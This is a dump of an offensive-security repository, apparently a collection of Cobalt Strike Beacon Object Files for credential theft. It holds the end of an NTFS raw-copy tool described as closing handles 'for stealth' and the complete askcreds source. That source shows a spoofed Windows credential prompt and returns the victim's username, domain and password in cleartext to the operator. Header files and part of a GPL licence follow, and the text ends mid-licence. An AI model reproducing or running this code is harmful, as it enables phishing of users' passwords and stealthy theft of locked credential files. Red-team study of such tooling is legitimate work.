    // Clean up handles using NtClose for stealth
    if (hVolume != INVALID_HANDLE_VALUE) {
        NTDLL$NtClose(hVolume);
    }
    if (hOutput != INVALID_HANDLE_VALUE) {
        NTDLL$NtClose(hOutput);
    }

    // Securely clear and free memory
    if (mftRecord) {
        MSVCRT$memset(mftRecord, 0, MFT_RECORD_SIZE);
        intFree(mftRecord);
    }
    if (fileInfo.runs) {
        MSVCRT$memset(fileInfo.runs, 0, sizeof(DATA_RUN) * fileInfo.runCount);
        intFree(fileInfo.runs);
    }
    if (fileInfo.residentData) {
        MSVCRT$memset(fileInfo.residentData, 0, fileInfo.residentDataSize);
        intFree(fileInfo.residentData);
    }
    if (sourceFileW) {
        MSVCRT$memset(sourceFileW, 0, sourceLen * sizeof(WCHAR));
        intFree(sourceFileW);
    }
    if (destFileW) {
        int destLen = KERNEL32$lstrlenW(destFileW) + 1;
        MSVCRT$memset(destFileW, 0, destLen * sizeof(WCHAR));
        intFree(destFileW);
    }

    if (fileBuffer) {
        MSVCRT$memset(fileBuffer, 0, (SIZE_T)fileSize);
        intFree(fileBuffer);
    }

    // Clear sensitive data from stack
    MSVCRT$memset(&boot, 0, sizeof(boot));
    MSVCRT$memset(&fileInfo, 0, sizeof(fileInfo));
}


================================================
FILE: Creds-BOF/UnderlayCopy/underlaycopy.h
================================================
#ifndef UNDERLAYCOPY_H
#define UNDERLAYCOPY_H

#include <windows.h>
#include <stdint.h>

// NTFS Constants
#define MFT_RECORD_SIZE 1024
// FILE_READ_ATTRIBUTES and FILE_FLAG_BACKUP_SEMANTICS are already defined in windows.h
#define FILE_SHARE_READ 0x00000001
#define FILE_SHARE_WRITE 0x00000002
#define FILE_SHARE_DELETE 0x00000004
#define OPEN_EXISTING 3

// NTSTATUS helper
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// NtCreateFile constants (if not defined)
#ifndef FILE_READ_DATA
#define FILE_READ_DATA 0x0001
#endif
#ifndef FILE_WRITE_DATA
#define FILE_WRITE_DATA 0x0002
#endif
#ifndef FILE_OPEN
#define FILE_OPEN 1
#endif
#ifndef FILE_OVERWRITE_IF
#define FILE_OVERWRITE_IF 5
#endif
#ifndef FILE_SYNCHRONOUS_IO_NONALERT
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#endif
#ifndef FILE_NON_DIRECTORY_FILE
#define FILE_NON_DIRECTORY_FILE 0x00000040
#endif
#ifndef FILE_OPEN_FOR_BACKUP_INTENT
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#endif
#ifndef OBJ_CASE_INSENSITIVE
#define OBJ_CASE_INSENSITIVE 0x00000040L
#endif

// NTFS Attribute Types
#define ATTRIBUTE_END 0xFFFFFFFF
#define ATTRIBUTE_FILE_NAME 0x30
#define ATTRIBUTE_DATA 0x80

// NTFS Boot Sector offsets
#define BOOT_BYTES_PER_SECTOR 11
#define BOOT_SECTORS_PER_CLUSTER 13
#define BOOT_MFT_CLUSTER 48

// Data Run structure
typedef struct {
    ULONGLONG lcn;
    ULONGLONG length;
} DATA_RUN;

// Extent structure (for Metadata mode)
typedef struct {
    ULONGLONG lcn;
    ULONGLONG lengthClusters;
} EXTENT;

// NTFS Boot Sector structure
typedef struct {
    WORD bytesPerSector;
    BYTE sectorsPerCluster;
    DWORD clusterSize;
    ULONGLONG mftCluster;
} NTFS_BOOT;

// File Info structure
typedef struct {
    ULONGLONG fileSize;
    ULONGLONG mftRecordNumber;
    DATA_RUN* runs;
    int runCount;
    BOOL hasRuns;
    BOOL isResident;
    BYTE* residentData;
    DWORD residentDataSize;
} FILE_INFO;

// Constants
#ifndef MAX_COMPUTERNAME_LENGTH
#define MAX_COMPUTERNAME_LENGTH 15
#endif

// FSCTL_GET_RETRIEVAL_POINTERS constants
#ifndef FSCTL_GET_RETRIEVAL_POINTERS
#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073
#endif

#ifndef ERROR_MORE_DATA
#define ERROR_MORE_DATA 234
#endif

// Structures for FSCTL_GET_RETRIEVAL_POINTERS are defined in winioctl.h
// STARTING_VCN_INPUT_BUFFER and RETRIEVAL_POINTERS_BUFFER are already defined there

// Helper function declarations
BOOL NormalizePathForCreateFileW(LPCWSTR path, WCHAR* normalizedPath, int bufferSize);
BOOL NormalizePathForNtCreateFile(LPCWSTR path, WCHAR* normalizedPath, int bufferSize);
BOOL CreateOutputFileNt(LPCWSTR destPath, HANDLE* hOutput);
BOOL CopyFileByExtentsToMemory(HANDLE hVolume, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize, BYTE** outputBuffer, ULONGLONG* outputSize);

// Common I/O functions
BOOL WriteSparseToFile(HANDLE hOutput, ULONGLONG offset, ULONGLONG size, BYTE* tempBuffer);
void WriteSparseToMemory(BYTE* destBuffer, ULONGLONG offset, ULONGLONG size);
BOOL CopyChunkToFile(HANDLE hVolume, HANDLE hOutput, ULONGLONG diskOffset, ULONGLONG toCopy, ULONGLONG writeOffset, BYTE* buffer, DWORD bufferSize, ULONGLONG* bytesWritten);
BOOL CopyChunkToMemory(HANDLE hVolume, BYTE* destBuffer, ULONGLONG destOffset, ULONGLONG diskOffset, ULONGLONG toCopy, BYTE* readBuffer, DWORD bufferSize, ULONGLONG* bytesCopied);

// Function declarations
BOOL ReadNtfsBoot(HANDLE hVolume, NTFS_BOOT* boot);
BOOL GetNtfsFileInfo(LPCWSTR filePath, ULONGLONG* mftRecordNumber, ULONGLONG* fileSize);
BOOL ReadMftRecord(HANDLE hVolume, NTFS_BOOT* boot, ULONGLONG recordNumber, BYTE* record);
int ParseDataRuns(BYTE* dataRuns, int dataRunsSize, DATA_RUN** runs, NTFS_BOOT* boot);
BOOL GetFileInfoFromRecord(BYTE* record, FILE_INFO* fileInfo, NTFS_BOOT* boot);
BOOL CopyFileByMft(HANDLE hVolume, HANDLE hOutput, FILE_INFO* fileInfo, NTFS_BOOT* boot);
int GetFileExtents(HANDLE hFile, EXTENT** extents, DWORD* extentCount);
BOOL CopyFileByExtents(HANDLE hVolume, HANDLE hOutput, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize);

#endif // UNDERLAYCOPY_H



================================================
FILE: Creds-BOF/askcreds/askcreds.c
================================================
#define SECURITY_WIN32

#include <windows.h>
#include <wincred.h>
#include <security.h>

#include "askcreds.h"
#include "beacon.h"

#define MAX_NAME 8192

typedef struct _THREAD_PARAMS {
	LPWSTR lpwReason;
	LPWSTR lpwMessage;
} THREAD_PARAMS, *PTHREAD_PARAMS;

void ConvertUnicodeStringToChar(const wchar_t* src, size_t srcSize, char* dst, size_t dstSize)
{
	KERNEL32$WideCharToMultiByte(CP_ACP, 0, src, (int)srcSize, dst, (int)dstSize, NULL, NULL);
	dst[dstSize - 1] = '\0';
}

BOOL CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam) {
	PCHAR pWindowTitle = NULL;
	LPWSTR pExeName = NULL;
	DWORD dwProcId = 0; 

	if (!hWnd)
		return TRUE;

	if (!USER32$IsWindowVisible(hWnd))
		return TRUE;

#if defined(WOW64)
	LONG_PTR lStyle = USER32$GetWindowLongA(hWnd, GWL_STYLE);
#else
	LONG_PTR lStyle = USER32$GetWindowLongPtrA(hWnd, GWL_STYLE);
#endif
	if (!USER32$GetWindowThreadProcessId(hWnd, &dwProcId))
		return TRUE;

	pWindowTitle = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_NAME);
	if (pWindowTitle == NULL)
		goto CleanUp;

	if (!USER32$SendMessageA(hWnd, WM_GETTEXT, MAX_NAME, (LPARAM)pWindowTitle))
		goto CleanUp;

	if (MSVCRT$_stricmp(pWindowTitle, "Windows Security") == 0) {
		USER32$PostMessageA(hWnd, WM_CLOSE, 0, 0);
	}
	else if ((dwProcId == KERNEL32$GetCurrentProcessId()) && (WS_POPUPWINDOW == (lStyle & WS_POPUPWINDOW))){
		USER32$PostMessageA(hWnd, WM_CLOSE, 0, 0);
	}
	else{
		DWORD dwSize = MAX_PATH;
		HANDLE hProcess = NULL;

		hProcess = KERNEL32$OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcId);
		if (hProcess != NULL && hProcess != INVALID_HANDLE_VALUE){
			pExeName = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_PATH);
			if (pExeName == NULL) {
				goto CleanUp;
			}

			if (KERNEL32$QueryFullProcessImageNameW(hProcess, 0, pExeName, &dwSize)) {
				if (SHLWAPI$StrStrIW(pExeName, L"CredentialUIBroker.exe")) {
					USER32$PostMessageA(hWnd, WM_CLOSE, 0, 0);
				}
			}
		}

		if (hProcess)
			KERNEL32$CloseHandle(hProcess);
	}

CleanUp:

	if (pWindowTitle)
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pWindowTitle);

	if (pExeName)
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pExeName);

	return TRUE;
}

DWORD WINAPI AskCreds(_In_ PTHREAD_PARAMS params) {
	DWORD dwRet = 0;
	HWND hWnd;
	CREDUI_INFOW credUiInfo;
	credUiInfo.pszCaptionText = params->lpwReason;
	credUiInfo.pszMessageText = (LPCWSTR) params->lpwMessage;
	credUiInfo.cbSize = sizeof(credUiInfo);
	credUiInfo.hbmBanner = NULL;
	credUiInfo.hwndParent = NULL;

	DWORD authPackage = 0;
	LPWSTR szUsername = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, 514);
	LPWSTR lpwPasswd = L"";
	LPVOID inCredBuffer = NULL;
	LPVOID outCredBuffer = NULL;
	ULONG inCredSize = 0;
	ULONG outCredSize = 0;
	BOOL bSave = FALSE;

	ULONG nSize = 256;
	if (SECUR32$GetUserNameExW(NameSamCompatible, szUsername, &nSize)) {
		if (!CREDUI$CredPackAuthenticationBufferW(CRED_PACK_GENERIC_CREDENTIALS, (LPWSTR)szUsername, lpwPasswd, 0, &inCredSize) && KERNEL32$GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
			inCredBuffer = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, inCredSize);
			if (inCredBuffer != NULL) {
				if (!CREDUI$CredPackAuthenticationBufferW(CRED_PACK_GENERIC_CREDENTIALS, (LPWSTR)szUsername, lpwPasswd, inCredBuffer, &inCredSize)) {
					KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, inCredBuffer);
					inCredBuffer = NULL;
					inCredSize = 0;
				}
			}
		}
	}
	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, szUsername);

	hWnd = USER32$GetForegroundWindow();
	if (hWnd != NULL) {
		credUiInfo.hwndParent = hWnd;
	}

	dwRet = CREDUI$CredUIPromptForWindowsCredentialsW(
		&credUiInfo, 0,
		&authPackage,
		inCredBuffer,
		inCredSize,
		&outCredBuffer,
		&outCredSize,
		&bSave,
		CREDUIWIN_GENERIC | CREDUIWIN_CHECKBOX
		);

	if (dwRet == ERROR_SUCCESS) {
		DWORD maxLenName     = 256;
		DWORD maxLenPassword = 256;
		DWORD maxLenDomain   = 256;
		LPWSTR szUsername = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (maxLenName + 1) * sizeof(WCHAR));
		LPWSTR szPasswd   = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (maxLenPassword + 1) * sizeof(WCHAR));
		LPWSTR szDomain   = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, (maxLenDomain + 1) * sizeof(WCHAR));

		if (CREDUI$CredUnPackAuthenticationBufferW(0, outCredBuffer, outCredSize, szUsername, &maxLenName, szDomain, &maxLenDomain, szPasswd, &maxLenPassword)) {

			char* username = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, maxLenName);
			char* password = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, maxLenPassword);;

			ConvertUnicodeStringToChar(szUsername, maxLenName, username, maxLenName);
			ConvertUnicodeStringToChar(szPasswd, maxLenPassword, password, maxLenPassword);

			if (MSVCRT$_wcsicmp(szDomain, L"") == 0) {
				BeaconPrintf(CALLBACK_OUTPUT,
					"[+] Username: %s\n"
					"[+] Password: %s\n", username, password);
			}
			else {
				char* domain = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, maxLenName);;
				ConvertUnicodeStringToChar(szDomain, maxLenDomain, domain, maxLenDomain);

				BeaconPrintf(CALLBACK_OUTPUT,
					"[+] Username: %s\n"
					"[+] Domainname: %s\n"
					"[+] Password: %s\n", username, domain, password);
				KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, domain);
			}
			KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, username);
			KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, password);
		}
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, szUsername);
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, szPasswd);
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, szDomain);
	}
	else if (dwRet == ERROR_CANCELLED) {
		BeaconPrintf(CALLBACK_ERROR, "The operation was canceled by the user\n");
	}
	else {
		BeaconPrintf(CALLBACK_ERROR, "CredUIPromptForWindowsCredentialsW failed, error: %d\n", dwRet);
	}

	if (inCredBuffer)
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, inCredBuffer);
	if (outCredBuffer)
		OLE32$CoTaskMemFree(outCredBuffer);

	return dwRet;
}

VOID go(IN PCHAR Args, IN ULONG Length) {
	PTHREAD_PARAMS params = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(THREAD_PARAMS));
	if (!params) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory for thread parameters.\n");
		return;
	}

	datap parser;
	BeaconDataParse(&parser, Args, Length);	
	params->lpwReason  = (WCHAR*)BeaconDataExtract(&parser, NULL);
	params->lpwMessage = (WCHAR*)BeaconDataExtract(&parser, NULL);
    DWORD dwTimeOut = BeaconDataInt(&parser) * 1000;

	DWORD ThreadId = 0;
	HANDLE hThread = KERNEL32$CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)AskCreds, (LPVOID)params, 0, &ThreadId);
	if (hThread == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to create thread.\n");
		return;
	}

	DWORD dwResult = KERNEL32$WaitForSingleObject(hThread, dwTimeOut);
	if (dwResult == WAIT_TIMEOUT) {  
		BeaconPrintf(CALLBACK_ERROR, "ThreadId: %d timed out, closing Window.\n", ThreadId);
		if (!USER32$EnumWindows(EnumWindowsProc, (LPARAM)NULL)) { // Cancel operation by closing Window.
			KERNEL32$TerminateThread(hThread, 0); // Only if WM_CLOSE failed, very dirty..
			return;
		}
		KERNEL32$WaitForSingleObject(hThread, 2000);
	}

	if (hThread)
		KERNEL32$CloseHandle(hThread);

	if (params)
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, params);

	return;
}


================================================
FILE: Creds-BOF/askcreds/askcreds.h
================================================
#pragma once

#include <windows.h>
#include <wincred.h>

#define CREDUIWIN_GENERIC 0x1
#define CREDUIWIN_CHECKBOX 0x2
#define CRED_PACK_GENERIC_CREDENTIALS 0x4

//CREDUI
DECLSPEC_IMPORT DWORD WINAPI CREDUI$CredUIPromptForWindowsCredentialsW(
	PCREDUI_INFOW pUiInfo,
	DWORD dwAuthError,
	ULONG *pulAuthPackage,
	LPCVOID pvInAuthBuffer,
	ULONG ulInAuthBufferSize,
	LPVOID *ppvOutAuthBuffer,
	ULONG *pulOutAuthBufferSize,
	BOOL *pfSave,
	DWORD dwFlags
	);

DECLSPEC_IMPORT BOOL WINAPI CREDUI$CredUnPackAuthenticationBufferW(
	DWORD dwFlags,
	PVOID pAuthBuffer,
	DWORD cbAuthBuffer,
	LPWSTR pszUserName,
	DWORD *pcchMaxUserName,
	LPWSTR pszDomainName,
	DWORD *pcchMaxDomainName,
	LPWSTR pszPassword,
	DWORD *pcchMaxPassword
	);

DECLSPEC_IMPORT BOOL WINAPI CREDUI$CredPackAuthenticationBufferW(
	DWORD dwFlags,
	LPWSTR pszUserName,
	LPWSTR pszPassword,
	PBYTE pPackedCredentials,
	DWORD *pcbPackedCredentials
	);

//KERNEL32
WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI BOOL WINAPI KERNEL32$TerminateThread(HANDLE hThread, DWORD dwExitCode);
WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentProcessId();
WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
WINBASEAPI BOOL WINAPI KERNEL32$QueryFullProcessImageNameW(HANDLE hProcess, DWORD  dwFlags, LPWSTR lpExeName, PDWORD lpdwSize);
WINBASEAPI int WINAPI KERNEL32$WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);

//MSVCRT
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2);
WINBASEAPI int __cdecl MSVCRT$_stricmp(const char *string1, const char *string2);

//USER32
WINUSERAPI WINBOOL USER32$EnumWindows(WNDENUMPROC lpEnumFunc,LPARAM lParam);
WINUSERAPI WINBOOL USER32$IsWindowVisible(HWND hWnd);
WINUSERAPI LRESULT USER32$SendMessageA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam);
WINUSERAPI WINBOOL USER32$PostMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
WINUSERAPI HWND USER32$GetForegroundWindow();
WINUSERAPI DWORD USER32$GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId);
WINUSERAPI LONG_PTR USER32$GetWindowLongPtrA(HWND hWnd, int  nIndex);
WINUSERAPI LONG_PTR USER32$GetWindowLongA(HWND hWnd, int  nIndex);

//SECUR32
WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExW(EXTENDED_NAME_FORMAT NameFormat, LPWSTR lpNameBuffer, PULONG nSize);
DECLSPEC_IMPORT VOID WINAPI OLE32$CoTaskMemFree(LPVOID pv);

//SHLWAPI
WINBASEAPI PCWSTR WINAPI SHLWAPI$StrStrIW(PCWSTR pszFirst, PCWSTR pszSrch);

================================================
FILE: Creds-BOF/cookie-monster/LICENSE
================================================
                    GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

  The GNU General Public License is a free, copyleft license for
software and other kinds of works.

  The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

  When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

  To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

  For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

  Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.

  For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

  Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

  Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary.  To prevent this, the GPL assures that
patents cannot be used to render the program non-free.

  The precise terms and conditions for copying, distribution and
modification follow.

                       TERMS AND CONDITIONS

  0. Definitions.

  "This License" refers to version 3 of the GNU General Public License.

  "Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

  "The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

  To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

  A "covered work" means either the unmodified Program or a work based
on the Program.

  To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

  To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

  An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

  1. Source Code.

  The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

  A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

  The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

  The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work.  For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

  The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

  The Corresponding Source for a work in source code form is that
same work.

  2. Basic Permissions.

  All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

  You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

  Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary.

  3. Protecting Users' Legal Rights From Anti-Circumvention Law.

  No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.

  When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.

  4. Conveying Verbatim Copies.

  You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.

  You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.

  5. Conveying Modified Source Versions.

  You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:

    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.

    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".

    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.

    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.

  A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit.  Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.

  6. Conveying Non-Source Forms.

  You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:

    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.

    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.

    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.

    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.

    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.

  A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.

  A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling.  In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage.  For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product.  A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.

  "Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source.  The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.

  If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information.  But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).

  The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
